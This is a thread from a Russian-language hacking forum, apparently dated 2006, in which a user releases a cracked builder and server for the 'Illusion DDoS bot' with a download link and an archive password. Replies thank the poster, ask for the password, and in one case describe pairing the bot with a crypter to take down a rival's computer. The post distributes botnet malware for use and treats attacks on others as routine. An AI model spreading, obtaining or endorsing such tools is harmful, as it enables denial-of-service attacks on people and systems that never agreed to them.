• XSS.stack #1 – первый литературный журнал от юзеров форума

Illusion DDos bot

Winux

Старожил форума
Легенда
Реакции
53
Illusion Ddos bot 1.1
http://news.xss.pro/illusionlogo.gif
Наконец то появилась такая возможность, сам illusion ddos bot, который еще вчера продавался за 400 баков.
Думаю данный продукт в представлении не нуждается, бывший приватный софт впервые появляется на ДЛ в паблик версии.
Все ридми и список функций в архиве.
В архиве: хелп, ридми, крякнутый билдер, некрякнутый билдер (во вложеном архиве), пустой сервер бота. Наслаждаемся.
:screenshot: Скриншот|Screenshot
:zns3: Пароль: xss.pro/_file_3482364348237
Закачка далее>>[New$paN]
:zns5: Скачать|Download

Чтоб не вызывало вопросов у защитников авторских прав:

Winux (03:14:48 31/08/2006)
можно я у ся кину?

KЕZ (03:15:00 31/08/2006)
что?

Winux (03:15:06 31/08/2006)
иллюжн

Winux (03:15:12 31/08/2006)
ну в пабл?

KЕZ (03:15:31 31/08/2006)
да пожалуйста

Куррент версия бота если не ошибаюсь 1.5, а т.к. барыги, торгующие 1.1 настолько задолбали автора бота, то самым лучшим выходом из данной ситуации - это выложить этот билд с крэком.

ЗЫ люди харе флэймить.

Короче говоря ситтуация такая. Автор утратил исходник и не может апдейтировать бота, а поскольку бот у барыг, он с него уже ничего не получает. Свой доход он уже с него получил, чтобы усложнить жизнь барыгам мы и предприняли такие вот действия.

спс большое:) хотя я хотел 1.5 версию покупать, так как достал один чел, который сказал, что я его комп в даун не отправлю.... теперь этот бот+криптер=выйгарнный спор:)

биг респект:)

Большая просьба к тем, у кого осталось видео с офф сайта:( качал видео, но обта не было-и не знаю где оно, а офф сайт не работает:( кому не сложно-залейти куда нибудь плз:(

Пароль дайте, а то спамить начну
Не, ну 100 сообщний набирать... Киньте в ПМ пароль, ПОЖАЛУЙСТА!
И тебе полетит бан...
А пасс даже подбирать не советую.... длинный....

Хм... А унас много времени :))

подбирать пасс быдешь долго... дам подсказку... пасс из 32 символов, больших и помойму мадленьких букв, спец символы и цифры:) причем это не шутка:) так что удачи:) плз не баньте меня за то, что выдал строжайший секрет:(

ой простите за флуд...
что уж больно много просяших появилось... неужели илюжн тока на дмаджабе выложили? неужели другие админы не спросили разрешения?

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх